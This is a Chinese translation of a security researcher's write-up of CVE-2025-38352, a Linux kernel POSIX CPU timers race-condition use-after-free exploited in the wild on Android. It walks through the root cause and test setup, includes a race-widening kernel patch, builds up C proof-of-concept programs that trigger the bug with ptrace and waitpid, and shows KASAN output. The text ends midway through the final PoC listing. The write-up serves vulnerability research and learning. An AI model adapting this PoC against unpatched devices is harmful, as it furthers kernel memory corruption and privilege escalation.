2026-01-26 14:42:26 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文分析Linux内核CVE-2025-38352，这是已在野外利用的POSIXCPUtimers竞争条件UAF漏洞。文章解析了通过僵尸进程回收与timer删除制造竞争窗口的原理。作者提供了环境配置与PoC代码，展示利用ptrace控制任务状态触发漏洞的方法，并探讨了利用难点，极具参考价值。 综合评分： 95 文章分类： 漏洞分析,漏洞POC,二进制安全

cover_image

CVE-2025-38352 Part 1 – 在野利用的 Android Kernel 竞争 UAF 分析与 PoC

Faraz Faraz

securitainment

2026年1月26日 10:24 广东

| 原文链接 | 作者 | | — | — | | https://faith2dxy.xyz/2025-12-22/cve_2025_38352_analysis/ | Faraz |

CVE-2025-38352 是 Linux kernel 的 POSIX CPU timers 实现中的一个竞争条件 use-after-free 漏洞，据报道已在野外遭到 有限、定向的利用：

这项漏洞的分析已经由 @streypaws 发布。他们的博客很好地解释了 POSIX CPU timers 的工作方式，以及触发该漏洞所需的条件。链接如下：

https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/

由于他们的博客没有提供一个可触发漏洞的 PoC 程序，我决定把周日晚上变成学习之夜，自己写一个。

本文简要展示了我分析漏洞与编写 PoC 的思路，也想说明这种方法对学习新东西有多么有价值。

PoC

如果你只想直接看 PoC，可以在这里找到：

https://github.com/farazsth98/poc-CVE-2025-38352

补丁提交

补丁提交链接：

https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f90fff1e152dedf52b932240ebbd670d83330eca

测试环境 TL;DR

Kernel 版本

我使用了 LTS kernel 版本 6.12.33，因为它是当时最新且仍受该 bug 影响的 LTS 版本。

CONFIG_POSIX_CPU_TIMERS_TASK_WORK

补丁提交中提到：如果启用了 CONFIG_POSIX_CPU_TIMERS_TASK_WORK，该漏洞无法被触发。

@streypaws 的博客提到他们无法关闭 CONFIG_POSIX_CPU_TIMERS_TASK_WORK标志。原因是默认情况下，这是一个定义在 kernel/time/Kconfig中的内部选项 (link)

config HAVE_POSIX_CPU_TIMERS_TASK_WORK
bool

config POSIX_CPU_TIMERS_TASK_WORK
bool
default&nbsp;y&nbsp;if&nbsp;POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK

并且 HAVE_POSIX_CPU_TIMERS_TASK_WORK在 arch/x86/Kconfig和 arch/arm64/Kconfig中都被设置了。因此，该漏洞实际上只在 32-bit Android 设备上可利用，这也解释了为什么它被描述为在野外遭到 有限、定向的利用。

为了能够关闭它，需要在 kernel/time/Kconfig中对 POSIX_CPU_TIMERS_TASK_WORK做如下修改：

config POSIX_CPU_TIMERS_TASK_WORK
bool"CVE-2025-38352: POSIX_CPU_TIMERS_TASK_WORK toggle"if&nbsp;EXPERT
&nbsp;depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
default&nbsp;y
&nbsp;help
&nbsp; &nbsp;For CVE-2025-38352&nbsp;analysis.

现在，你就可以通过 make menuconfig来切换该选项。

作为参考，我以 kernelCTF LTS config (link) 为基底，只做了上述修改，以便能够关闭 CONFIG_POSIX_CPU_TIMERS_TASK_WORK。

我还在 make menuconfig中启用了 full preemption (在菜单中搜索 PREEMPT)，因为 Android kernel 默认开启了它。

QEMU 配置

由于这是一个竞争条件，至少需要两颗 CPU 才能触发。我的测试使用了 4 vCPU 的 QEMU VM:

qemu-system-x86_64&nbsp;\
&nbsp; &nbsp; -enable-kvm&nbsp;\
&nbsp; &nbsp; -cpu host&nbsp;\
&nbsp; &nbsp; -smp cores=4&nbsp;\
# [ ... ]

漏洞回顾

强烈建议你在继续之前先阅读 @streypaws 的博客 (link)。我这里只补充该文中与“如何触发”相关的部分。

每当 per-CPU scheduler tick 发生时，kernel 会在每个 CPU 上调用 run_posix_cpu_timers()。如果有 timer 准备触发，该函数最终会调用 handle_posix_cpu_timers()。

该漏洞之所以出现，是因为即便 task 已经变成 zombie (也就是 task 的 tsk->exit_state被设置为 EXIT_ZOMBIE)，handle_posix_cpu_timers()仍然允许执行。

我们先快速看一下 handle_posix_cpu_timers()，以便理解漏洞的关键点：

staticvoidhandle_posix_cpu_timers(struct&nbsp;task_struct *tsk)
{
struct&nbsp;k_itimer *timer, *next;
unsignedlong&nbsp;flags, start;
LIST_HEAD(firing);&nbsp;// Faith: local list of timers

// Faith: acquire tsk->sighand->siglock
if&nbsp;(!lock_task_sighand(tsk, &flags))
return;

do&nbsp;{
// [ 1 ]
// Collect all firing timers into the `firing` list
check_thread_timers(tsk, &firing);
check_process_timers(tsk, &firing);

// [ ... ]
&nbsp;}&nbsp;while&nbsp;(!posix_cpu_timers_enable_work(tsk, start));

// Faith: release tsk->sighang->siglock
unlock_task_sighand(tsk, &flags);

// Faith: RACE WINDOW START

// [ 2 ]
// Faith: Iterate over the `firing` list and fire the timers
list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
// [ ... ]
// Faith: RACE WINDOW ENDs after the timer is finished being
// &nbsp; &nbsp; &nbsp; &nbsp;accessed.
&nbsp;}
}

结合我在上面代码中的注释，并假设只有一个正在触发的 timer:

在获取 tsk->sighand->siglock之后，它会收集该触发 timer 并把它放进本地的 firinglist。注意，这一步会把 timer 从 task 上移除。
timer 被收集后，会释放 tsk->sighand->siglock，然后函数遍历本地 firinglist 并触发 timer。

如果该 task 是 zombie，那么在释放 tsk->sighand->siglock之后就会出现一个竞争窗口。在这个窗口里，另一个进程可以做以下两件事来释放 firinglist 中的 timer:

回收 (reap) zombie task

— 父进程可以通过 waitpid()来完成。
调用 timer_delete()syscall

— 这会调用 posix_cpu_timer_del()，并通过 RCU 释放 timer。

当父进程回收 zombie task 时，会对它调用 release_task()，最终通过 __exit_signal()将 tsk->sighand置为 NULL:

staticvoid__exit_signal(struct&nbsp;task_struct *tsk)
{
// [ ... ]

&nbsp;sighand =&nbsp;rcu_dereference_check(tsk->sighand,
lockdep_tasklist_lock_is_held());
spin_lock(&sighand->siglock);

// [ ... ]

&nbsp;tsk->sighand =&nbsp;NULL;&nbsp;// Faith: HERE
spin_unlock(&sighand->siglock);

// [ ... ]
}

随后，当通过 timer_delete()调用 posix_cpu_timer_del()时，它会发现 tsk->sighand为 NULL，于是直接返回 0:

staticintposix_cpu_timer_del(struct&nbsp;k_itimer *timer)
{
// [ ... ]
int&nbsp;ret =&nbsp;0;

// [ ... ]
&nbsp;sighand =&nbsp;lock_task_sighand(p, &flags);
if&nbsp;(unlikely(sighand ==&nbsp;NULL)) {
WARN_ON_ONCE(ctmr->head ||&nbsp;timerqueue_node_queued(&ctmr->node));
&nbsp;}&nbsp;else&nbsp;{
// [ ... ]
&nbsp;}

out:
// [ ... ]
return&nbsp;ret;
}

当 posix_cpu_timer_del()返回 0 后，会回到 timer_delete()的 syscall handler，并调用 posix_timer_unhash_and_free()来释放 timer:

SYSCALL_DEFINE1(timer_delete,&nbsp;timer_t, timer_id)
{
// [ ... ]
retry_delete:
// [ ... ]
// Faith: timer_delete_hook() calls posix_cpu_timer_del()
if&nbsp;(unlikely(timer_delete_hook(timer) == TIMER_RETRY)) {
/* Unlocks and relocks the timer if it still exists */
&nbsp; timer =&nbsp;timer_wait_running(timer, &flags);
goto&nbsp;retry_delete;
&nbsp;}

// [ ... ]
posix_timer_unhash_and_free(timer);
return0;
}

实际的释放通过 RCU 完成，因此不会立刻发生：

staticvoidposix_timer_unhash_and_free(struct&nbsp;k_itimer *tmr)
{
// [ ... ]
posix_timer_free(tmr);
}

staticvoidposix_timer_free(struct&nbsp;k_itimer *tmr)
{
// [ ... ]
call_rcu(&tmr->rcu, k_itimer_rcu_free);
}

如果上述过程都发生在前面描述的竞争窗口内，那么当 handle_posix_cpu_timers()遍历本地 firinglist 并访问该 timer 时，就会触发 UAF:

staticvoidhandle_posix_cpu_timers(struct&nbsp;task_struct *tsk)
{
// [ ... ]
// Faith: Iterate over the `firing` list and fire the timers
list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
// [ ... ]
// Faith: UAF occurs here
&nbsp;}
}

规划 PoC

既然我们已经知道如何触发漏洞，就一步步规划一个 PoC。

最小化 POSIX CPU Timer PoC

首先我们需要能让代码路径进入 handle_posix_cpu_timers()。下面这个最小 PoC 可以做到：

#include<time.h>
#include<signal.h>
#include<stdio.h>
#include<unistd.h>

voidtimer_fire(void) {
printf("Timer fired\n");
}

intmain(void) {
structsigevent&nbsp;sev = {0};
&nbsp; &nbsp; sev.sigev_notify&nbsp;= SIGEV_THREAD;
&nbsp; &nbsp; sev.sigev_notify_function&nbsp;= (void&nbsp;(*)(sigval_t))timer_fire;

timer_t&nbsp;timer;
int&nbsp;timerfd =&nbsp;timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer);
printf("Timer created:&nbsp;%d\n", timerfd);

struct&nbsp;itimerspec ts = {
&nbsp; &nbsp; &nbsp; &nbsp; .it_interval&nbsp;= {0,&nbsp;0},
&nbsp; &nbsp; &nbsp; &nbsp; .it_value&nbsp;= {1,&nbsp;0},
&nbsp; &nbsp; };

timer_settime(timer,&nbsp;0, &ts,&nbsp;NULL);
printf("Timer started:&nbsp;%d\n", timerfd);

// Use up CPU time to fire the timer
while&nbsp;(1);
}

timer_create()

用于创建一个 POSIX CPU timer，在触发时调用 timer_fire()。
timer_settime()

将 timer 设置为在当前 thread 消耗 1 秒 CPU time 后触发。

创建 Zombie Task

为了理解如何把一个 task 转换到 EXIT_ZOMBIE退出状态，我们来看一下 exit_notify()：当线程/进程运行结束并退出时，它会通过 do_exit()调用 exit_notify():

staticvoidexit_notify(struct&nbsp;task_struct *tsk,&nbsp;int&nbsp;group_dead)
{
// [ ... ]
LIST_HEAD(dead);

// [ ... ]

&nbsp;tsk->exit_state = EXIT_ZOMBIE;&nbsp;// [ 1 ]

// [ ... ]
// [ 2 ]
if&nbsp;(unlikely(tsk->ptrace)) {
int&nbsp;sig =&nbsp;thread_group_leader(tsk) &&
thread_group_empty(tsk) &&
&nbsp; &nbsp; !ptrace_reparented(tsk) ?
&nbsp; &nbsp;tsk->exit_signal : SIGCHLD;
&nbsp; autoreap =&nbsp;do_notify_parent(tsk, sig);
&nbsp;}

// [ ... ]
// [ 3 ]
if&nbsp;(autoreap) {
&nbsp; tsk->exit_state = EXIT_DEAD;
list_add(&tsk->ptrace_entry, &dead);
&nbsp;}

// [ ... ]
// [ 4 ]
list_for_each_entry_safe(p, n, &dead, ptrace_entry) {
list_del_init(&p->ptrace_entry);
release_task(p);
&nbsp;}
}

结合上面代码里的标注：

task 的 exit state 初始会被自动设置为 EXIT_ZOMBIE。
如果 task 当前正被 ptrace，autoreap会被设置为 do_notify_parent()的返回值。

只要父进程不忽略 SIGCHLDsignals，do_notify_parent()就会返回 false。

如果 autoreap为 true，task 的 exit state 会改为 EXIT_DEAD，并被加入本地 deadlist。
遍历本地 deadlist，对其中每个 task 调用 release_task()。

根据上一节分析，我们知道 release_task()会把 tsk->sighand置为 NULL。

但我们希望 handle_posix_cpu_timers()能锁住 tsk->sighand->siglock，并把我们的 firing timer 收集进本地 firinglist，因此这里不希望 task 被 release。

因此，要在这里制造一个 zombie task，必须让 tsk->ptrace被设置，也就是说需要有一个父进程在 ptrace 这个 task。同时父进程必须不能忽略 SIGCHLDsignals。

回收 Zombie Task

在 threads 与 processes 的语境下，”reaping” 指的是完全释放并回收一个 task (主要是为其分配的 task_struct)。通常回收的最后一步，是让 kernel 对该 task 调用 release_task()。

在父 ptracer 进程中调用 waitpid(zombie_task_pid, ...)可以回收 zombie task。我们希望走到的调用栈如下：

do_wait()
-> __do_wait()
-> do_wait_pid()
-> wait_consider_task()
-> wait_task_zombie()
-> release_task()

这条调用栈涉及的代码太多，不便完整展示。为了成功回收 zombie task 并让 kernel 调用 release_task()，我们需要满足以下关键条件：

只有当我们指定的是 PID (而不是 TGID、PGID 等) 时，才会走到 do_wait_pid()。
只有满足以下条件才会调用 wait_task_zombie():

zombie task 正在被 ptrace。
zombie task 不是当前 thread group leader (默认情况下，thread group leader 是进程的主线程)。

要满足以上条件，zombie task 必须是被父进程 ptrace 的某个进程中的非主线程。

另外，父进程必须把 zombie task 的 thread ID (本质就是一个 PID) 传给 waitpid()，这意味着子进程需要以某种方式把该 thread ID 告诉父进程。

可控地回收 Zombie Task

下面这个 PoC 演示了一个父进程，如何完全控制“何时回收”子进程中的非主线程：

#define_GNU_SOURCE
#include<stdio.h>
#include<pthread.h>
#include<sys/ptrace.h>
#include<sys/wait.h>
#include<err.h>
#include<sys/prctl.h>
#include<sys/syscall.h>

#defineSYSCHK(x) ({ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\
typeof(x) __res = (x); &nbsp; &nbsp; &nbsp;\
if&nbsp;(__res == (typeof(x))-1) \
err(1,&nbsp;"SYSCHK("&nbsp;#x&nbsp;")"); \
&nbsp; &nbsp; __res; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\
})

voidpin_on_cpu(int&nbsp;i) {
cpu_set_t&nbsp;mask;
CPU_ZERO(&mask);
CPU_SET(i, &mask);
sched_setaffinity(0,&nbsp;sizeof(mask), &mask);
}

pthread_t&nbsp;reapee_thread;
pthread_barrier_t&nbsp;barrier;
int&nbsp;c2p[2];&nbsp;// child to parent
int&nbsp;p2c[2];&nbsp;// parent to child

voidreapee(void) {
pin_on_cpu(2);
prctl(PR_SET_NAME,&nbsp;"REAPEE");

// Send this thread's TID to the parent process
pid_t&nbsp;tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(c2p[1], &tid,&nbsp;sizeof(pid_t)));

// Wait for the parent to attach
pthread_barrier_wait(&barrier);

return;
}

intmain(int&nbsp;argc,&nbsp;char&nbsp;*argv[]) {
// Parent and child setup
// Use pipes to communicate between parent and child
SYSCHK(pipe(c2p));
SYSCHK(pipe(p2c));

pid_t&nbsp;pid =&nbsp;SYSCHK(fork());

if&nbsp;(pid) {
// parent
pin_on_cpu(1);
char&nbsp;m;
close(c2p[1]);
close(p2c[0]);

// Receive child process's REAPEE thread'sTID
pid_t&nbsp;tid;
SYSCHK(read(c2p[0], &tid,&nbsp;sizeof(pid_t)));
printf("Parent: reapee thread ID:&nbsp;%d\n", tid);

// Attach to the REAPEE thread and continue it
printf("Parent: attaching to REAPEE thread\n");
SYSCHK(ptrace(PTRACE_ATTACH, tid,&nbsp;NULL,&nbsp;NULL));
SYSCHK(waitpid(tid,&nbsp;NULL, __WALL));
SYSCHK(ptrace(PTRACE_CONT, tid,&nbsp;NULL,&nbsp;NULL));

// Signal to child that we attached and continued
SYSCHK(write(p2c[1], &m,&nbsp;1));

// Reap the REAPEE thread now
printf("Parent: press enter to reap REAPEE thread\n");
getchar();
SYSCHK(waitpid(tid,&nbsp;NULL, __WALL));
printf("Parent: detached from REAPEE\n");

sleep(5);
&nbsp; &nbsp; }&nbsp;else&nbsp;{
// child
pin_on_cpu(0);
char&nbsp;m;
close(c2p[0]);
close(p2c[1]);

prctl(PR_SET_NAME,&nbsp;"CHILD_MAIN");
pthread_barrier_init(&barrier,&nbsp;NULL,&nbsp;2);
pthread_create(&reapee_thread,&nbsp;NULL, (void*)reapee,&nbsp;NULL);

printf("Thread created\n");

// Parent process writes to us when attached and continued, use
// a barrier to continue the REAPEE thread now
SYSCHK(read(p2c[0], &m,&nbsp;1));
pthread_barrier_wait(&barrier);

pause();
&nbsp; &nbsp; }
}

运行该 PoC 时，在观察到以下输出后，将 GDB attach 到 kernel:

Thread created
Parent: reapee thread ID: 152
Parent: attaching to REAPEE thread
Parent: press enter to reap REAPEE thread

在 GDB 中，对 release_task()下断点并继续执行。你可以在任意时刻按回车触发 release_task():

gef> p p->comm
$1&nbsp;=&nbsp;"REAPEE\000\000\000\000\000\000\000\000\000"

gef> bt
#0release_task&nbsp;(p=p@entry=0xffff88800892d280) at kernel/exit.c:245
#10xffffffff811a549f&nbsp;in&nbsp;wait_task_zombie&nbsp;(p=0xffff88800892d280, wo=0xffffc90000627eb0) at kernel/exit.c:1254
#2wait_consider_task&nbsp;(wo=wo@entry=0xffffc90000627eb0, ptrace=<optimized out>, ptrace@entry=0x1, p=0xffff88800892d280) at kernel/exit.c:1481
#30xffffffff811a6cd6&nbsp;in&nbsp;do_wait_pid&nbsp;(wo=0xffffc90000627eb0) at kernel/exit.c:1629
#4__do_wait&nbsp;(wo=wo@entry=0xffffc90000627eb0) at kernel/exit.c:1655
#50xffffffff811a6d86&nbsp;in&nbsp;do_wait&nbsp;(wo=wo@entry=0xffffc90000627eb0) at kernel/exit.c:1696

注意，release_task()也会周期性地被调用以回收 kworkerthreads。遇到这种情况可以忽略并继续。

编写 PoC

现在，终于可以开始写 PoC 了！

用 Kernel 补丁延长竞争窗口

为了更容易触发 bug，我在 handle_posix_cpu_timers()里加了一个 500 ms 延迟来延长竞争窗口。这能让 PoC 更稳定：

staticvoidhandle_posix_cpu_timers(struct&nbsp;task_struct *tsk)
{
// [ ... ]
unlock_task_sighand(tsk, &flags);

// Faith: extend the race window
if&nbsp;(strcmp(tsk->comm,&nbsp;"SLOWME") ==&nbsp;0) {
printk("Faith: Did we win? tsk->exit_state:&nbsp;%d\n", tsk->exit_state);
mdelay(500);
&nbsp;}

// [ ... ]
}

但事实证明，这个 patch 几乎是必需的。我确实见过触发一两次，但极其罕见，原因有二：

默认情况下，在只有一个 timer (也是我下面 PoC 使用的情况) 时，竞争窗口大约只有 3000–4000 ns，要在这个窗口里同时命中 reap + free 非常困难。
timer 的释放由 RCU 处理，它很可能会花超过 4000 ns。

我猜我有几次只是运气好：某些诡异行为让竞争窗口停留得足够久，才同时满足以上两点，但确实不可靠。

想看我是如何写出一个不需要上述 delay patch 的 PoC，请看本文 Part 2!

触发竞争条件

为了触发这个竞争条件，我们需要把上一节的两个 PoC 组合起来，并确保 POSIX CPU timer 的触发时机落在 exit_notify()将 tsk->exit_state转换为 EXIT_ZOMBIE之后。

这实际上意味着：当子进程中的非主线程退出时，必须留下“刚刚好”的 CPU time，让 kernel 的 do_exit()在 timer 触发前有时间调用 exit_notify()，并把 task 转换成 zombie。

但也不能剩太多 CPU time! 否则 do_exit()会跑完并消耗它需要的 CPU time，如果 timer 还需要在这之后继续消耗更多 CPU time 才能触发，那它反而会一直触发不了。

通过一些试错，在我的本地环境里，把 CPU time 设置为 250,000 ns 效果不错。

下面我们逐步走一遍最终 PoC 的关键部分 (完整 PoC 在文末)。

自定义等待时间的实现

首先，我通过 argv[1]提供一个自定义 wait_time，方便测试。这个值表示 timer 触发前需要消耗的 CPU time:

longint&nbsp;wait_time =&nbsp;250000;&nbsp;// Works for me

intmain(int&nbsp;argc,&nbsp;char&nbsp;*argv[]) {
// Use a custom wait time to figure out the exact timing when the
// timer will fire right after `exit_notify()` sets the task's
// state to EXIT_ZOMBIE.
if&nbsp;(argc >&nbsp;1) {
&nbsp; &nbsp; &nbsp; &nbsp; wait_time =&nbsp;strtol(argv[1],&nbsp;NULL,&nbsp;10);
printf("Custom wait time:&nbsp;%ld\n", wait_time);
&nbsp; &nbsp; }

设置 Timer

现在，在 reapee 线程中创建一个 POSIX CPU timer，并把它设置为在自定义 wait_time之后触发。

同时要把线程名设置为 SLOWME，这样它会受到我们在 handle_posix_cpu_timers()中加入的自定义 mdelay()patch 的影响：

voidreapee(void) {
pin_on_cpu(2);
structsigevent&nbsp;sev = {0};
&nbsp; &nbsp; sev.sigev_notify&nbsp;= SIGEV_THREAD;
&nbsp; &nbsp; sev.sigev_notify_function&nbsp;= (void&nbsp;(*)(sigval_t))timer_fire;
char&nbsp;m;

prctl(PR_SET_NAME,&nbsp;"SLOWME");

// Send this thread's TID to the parent process
pid_t&nbsp;tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(c2p[1], &tid,&nbsp;sizeof(pid_t)));

printf("Creating timer\n");
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer));
printf("Timer created\n");

struct&nbsp;itimerspec ts = {
&nbsp; &nbsp; &nbsp; &nbsp; .it_interval&nbsp;= {0,&nbsp;0},
&nbsp; &nbsp; &nbsp; &nbsp; .it_value&nbsp;= {0, wait_time},&nbsp;// Custom wait time
&nbsp; &nbsp; };

// Wait for parent to attach
pthread_barrier_wait(&barrier);

SYSCHK(timer_settime(timer,&nbsp;0, &ts,&nbsp;NULL));

// Use some CPU time to make sure the timer will fire correctly
for&nbsp;(int&nbsp;i =&nbsp;0; i <&nbsp;1000000; i++);

return;
}

回收 Timer 线程并删除 Timer

最后，在父/子进程中需要完成以下操作：

父进程

— 像之前一样回收 REAPEE 线程，并等待子进程释放 timer。
子进程

— 等待父进程回收 REAPEE 线程，然后调用 timer_delete()删除 timer。

intmain(int&nbsp;argc,&nbsp;char&nbsp;*argv[]) {
// [ ... ]
pid_t&nbsp;pid =&nbsp;SYSCHK(fork());

if&nbsp;(pid) {
// parent
// [ ... ]

// Signal to child that we attached and continued
SYSCHK(write(p2c[1], &m,&nbsp;1));

// Reap the REAPEE thread now
printf("Parent: reaping REAPEE thread\n");
SYSCHK(waitpid(tid,&nbsp;NULL, __WALL));
printf("Parent: detached from REAPEE\n");

// Let the child process know REAPEE is reaped
SYSCHK(write(p2c[1], &m,&nbsp;1));

// Let the child process delete and free the timer
// before exiting
SYSCHK(read(c2p[0], &m,&nbsp;1));
&nbsp; &nbsp; }&nbsp;else&nbsp;{
// child
// [ ... ]

// Parent process writes to us when attached and continued, use
// a barrier to continue the REAPEE thread now
SYSCHK(read(p2c[0], &m,&nbsp;1));
pthread_barrier_wait(&barrier);

// Parent process writes to us when waitpid() returns successfully.
//
// At this point, if we won the race, `handle_posix_cpu_timers()` will be in
// the patched `mdelay(500)` with `tsk->exit_state != 0`, and calling
// `timer_delete()` should make it see a NULL `sighand`, which will cause it to
// just free the timer unconditionally.
SYSCHK(read(p2c[0], &m,&nbsp;1));
timer_delete(timer);
printf("Child: timer deleted\n");

// Let the timer be freed by RCU, then let the parent process know it can exit
wait_for_rcu();
SYSCHK(write(c2p[1], &m,&nbsp;1));
pause();
&nbsp; &nbsp; }
}

测试 PoC

就是这些！运行 PoC 的步骤如下：

用 gcc -o poc -static poc.c编译
在 VM 中用 while true; do /poc; done运行

注意 PoC 并不是100% 命中竞争条件，所以我用 bash while 循环一直重复直到命中。

你应当先把默认的 wait_time调到适合你测试环境的值。

下面看看 KASAN 和非 KASAN 的 splat 长什么样 👀

KASAN 报错 (Splat)

开启 KASAN 后，可以观察到一次 UAF write:

[ &nbsp; &nbsp;9.995817] ==================================================================
[ &nbsp; &nbsp;9.999410] BUG: KASAN: slab-use-after-free in posix_timer_queue_signal+0x16a/0x1a0
[ &nbsp;&nbsp;10.003168] Write of size&nbsp;4&nbsp;at addr ffff88800e628188 by task SLOWME/179
[ &nbsp;&nbsp;10.006386]
[ &nbsp;&nbsp;10.007400] CPU:&nbsp;2&nbsp;UID:&nbsp;0&nbsp;PID:&nbsp;179&nbsp;Comm: SLOWME Not tainted&nbsp;6.12.33&nbsp;#7
[ &nbsp;&nbsp;10.007406] Hardware name: QEMU Standard&nbsp;PC&nbsp;(i440FX + PIIX,&nbsp;1996), BIOS 1.15.0-1 04/01/2014
[ &nbsp; 10.007408] Call Trace:
[ &nbsp; 10.007455] &nbsp;<IRQ>
[ &nbsp; 10.007468] &nbsp;dump_stack_lvl+0x66/0x80
[ &nbsp; 10.007487] &nbsp;print_report+0xc1/0x610
[ &nbsp; 10.007503] &nbsp;? posix_timer_queue_signal+0x16a/0x1a0
[ &nbsp; 10.007506] &nbsp;kasan_report+0xaf/0xe0
[ &nbsp; 10.007509] &nbsp;? posix_timer_queue_signal+0x16a/0x1a0
[ &nbsp; 10.007512] &nbsp;posix_timer_queue_signal+0x16a/0x1a0
[ &nbsp; 10.007515] &nbsp;cpu_timer_fire+0x8d/0x190
[ &nbsp; 10.007518] &nbsp;run_posix_cpu_timers+0x807/0x1840

非 KASAN 报错 (Splat)

关闭 KASAN 后，可以观察到 send_sigqueue()内部的一个 WARN_ON_ONCE:

[ &nbsp;&nbsp;29.647984] ------------[ cut here ]------------
[ &nbsp;&nbsp;29.650267] WARNING: CPU:&nbsp;2&nbsp;PID:&nbsp;205&nbsp;at kernel/signal.c:1974&nbsp;send_sigqueue+0x1be/0x250
[ &nbsp;&nbsp;29.653905] Modules linked in:
[ &nbsp;&nbsp;29.655484] CPU:&nbsp;2&nbsp;UID:&nbsp;0&nbsp;PID:&nbsp;205&nbsp;Comm: SLOWME Not tainted&nbsp;6.12.33&nbsp;#5
[ &nbsp;&nbsp;29.658569] Hardware name: QEMU Standard&nbsp;PC&nbsp;(i440FX + PIIX,&nbsp;1996), BIOS 1.15.0-1 04/01/2014
[ &nbsp; 29.662579] RIP: 0010:send_sigqueue+0x1be/0x250
[ &nbsp; 29.664712] Code: 44 89 e0 5b 5d 41 5c 41 5d 41 5e 41 5f e9 d5 e9 94 01 41 bc ff ff ff ff eb e2 48 8b 85 b0 07 00 00 48 8d 50 40 e9 2a ff ff ff <0f> 0b 45 31 e4 eb cb 0f 0b eb c7 4c 89 fe e8 bf 47 6a 01 48 8b bd
// [ ... ] Register states snipped out
[ &nbsp; 29.703210] Call Trace:
[ &nbsp; 29.704498] &nbsp;<IRQ>
[ &nbsp; 29.705663] &nbsp;posix_timer_queue_signal+0x3f/0x50
[ &nbsp; 29.707869] &nbsp;cpu_timer_fire+0x23/0x70
[ &nbsp; 29.709572] &nbsp;run_posix_cpu_timers+0x2bc/0x5e0

关于 `CONFIG_POSIX_CPU_TIMERS_TASK_WORK`的简短补充

@streypaws 的博客 (link) 提到即便启用了 CONFIG_POSIX_CPU_TIMERS_TASK_WORK也能命中这个漏洞，但我没能复现同样的结果。

事实上，在看过 do_exit()中 exit_task_work()的行为后，就能理解为什么启用 CONFIG_POSIX_CPU_TIMERS_TASK_WORK时无法触发该漏洞：

exit_task_work()

会调用 task_work_run()。
task_work_run()

会“污染 (poison)” task->task_works结构，阻止后续继续向其队列新的 work。

由于该漏洞要求 exit_notify()在 handle_posix_cpu_timers()之前被调用，而 exit_task_work()(如果被排队，会调用 handle_posix_cpu_timers()) 在 exit_notify()之前执行，因此启用 CONFIG_POSIX_CPU_TIMERS_TASK_WORK时无法触发该漏洞。

利用 (Exploitation)

我不确定是否会花时间为该漏洞编写 exploit，不过我记下了以下几点：

POSIX CPU timers 会从独立的 kmem_cache中分配。
struct k_itimer

结构并不复杂，因此很可能需要 cross-cache。
要做 cross-cache，handle_posix_cpu_timers()内的竞争窗口可能需要延长。
延长竞争窗口可能会比较棘手，因为 handle_posix_cpu_timers()运行在 scheduler tick interrupt context 中，此时 IRQs 被禁用。

我的 PoC 已经提供了一个 UAF primitive；显然从 Android bulletin 的描述来看，该漏洞肯定可利用。剩下只是解决上面的 exploit engineering 问题。

如果我最终投入时间做利用，我会再写一篇新博客作为本文更新！😄

结论

正如我在以前的博客里提到过的，我的观点是：对复杂漏洞进行分析并编写 PoC，是学习与开展漏洞研究的最佳方式。

在这个案例里，我不仅学习了 POSIX CPU timers，还学习了 timer 的通用工作方式，以及 Linux kernel 如何通过 task structures 描述进程与线程。

如果你有任何问题，欢迎通过 Twitter 或其它渠道联系我！

最终 PoC

最终 PoC 已上传到我的 Github。链接如下：

https://github.com/farazsth98/poc-CVE-2025-38352

也在下方展示：

#define_GNU_SOURCE
#include<time.h>
#include<signal.h>
#include<stdio.h>
#include<unistd.h>
#include<pthread.h>
#include<sys/ptrace.h>
#include<sys/wait.h>
#include<sys/types.h>
#include<stdlib.h>
#include<err.h>
#include<sys/prctl.h>
#include<sched.h>
#include<linux/membarrier.h>
#include<sys/syscall.h>

#defineSYSCHK(x) ({ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\
typeof(x) __res = (x); &nbsp; &nbsp; &nbsp;\
if&nbsp;(__res == (typeof(x))-1) \
err(1,&nbsp;"SYSCHK("&nbsp;#x&nbsp;")"); \
&nbsp; &nbsp; __res; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\
})

voidpin_on_cpu(int&nbsp;i) {
cpu_set_t&nbsp;mask;
CPU_ZERO(&mask);
CPU_SET(i, &mask);
sched_setaffinity(0,&nbsp;sizeof(mask), &mask);
}

voidtimer_fire(void) {
prctl(PR_SET_NAME,&nbsp;"TIMER_FIRED");
printf("Timer fired\n");
}

voidwait_for_rcu() {
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL,&nbsp;0);
}

pthread_barrier_t&nbsp;barrier;
timer_t&nbsp;timer;
pthread_t&nbsp;reapee_thread;
int&nbsp;c2p[2];&nbsp;// child to parent
int&nbsp;p2c[2];&nbsp;// parent to child
longint&nbsp;wait_time =&nbsp;250000;

voidreapee(void) {
pin_on_cpu(2);
structsigevent&nbsp;sev = {0};
&nbsp; &nbsp; sev.sigev_notify&nbsp;= SIGEV_THREAD;
&nbsp; &nbsp; sev.sigev_notify_function&nbsp;= (void&nbsp;(*)(sigval_t))timer_fire;
char&nbsp;m;

prctl(PR_SET_NAME,&nbsp;"SLOWME");

// Send this thread's TID to the parent process
pid_t&nbsp;tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(c2p[1], &tid,&nbsp;sizeof(pid_t)));

printf("Creating timer\n");
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer));
printf("Timer created\n");

struct&nbsp;itimerspec ts = {
&nbsp; &nbsp; &nbsp; &nbsp; .it_interval&nbsp;= {0,&nbsp;0},
&nbsp; &nbsp; &nbsp; &nbsp; .it_value&nbsp;= {
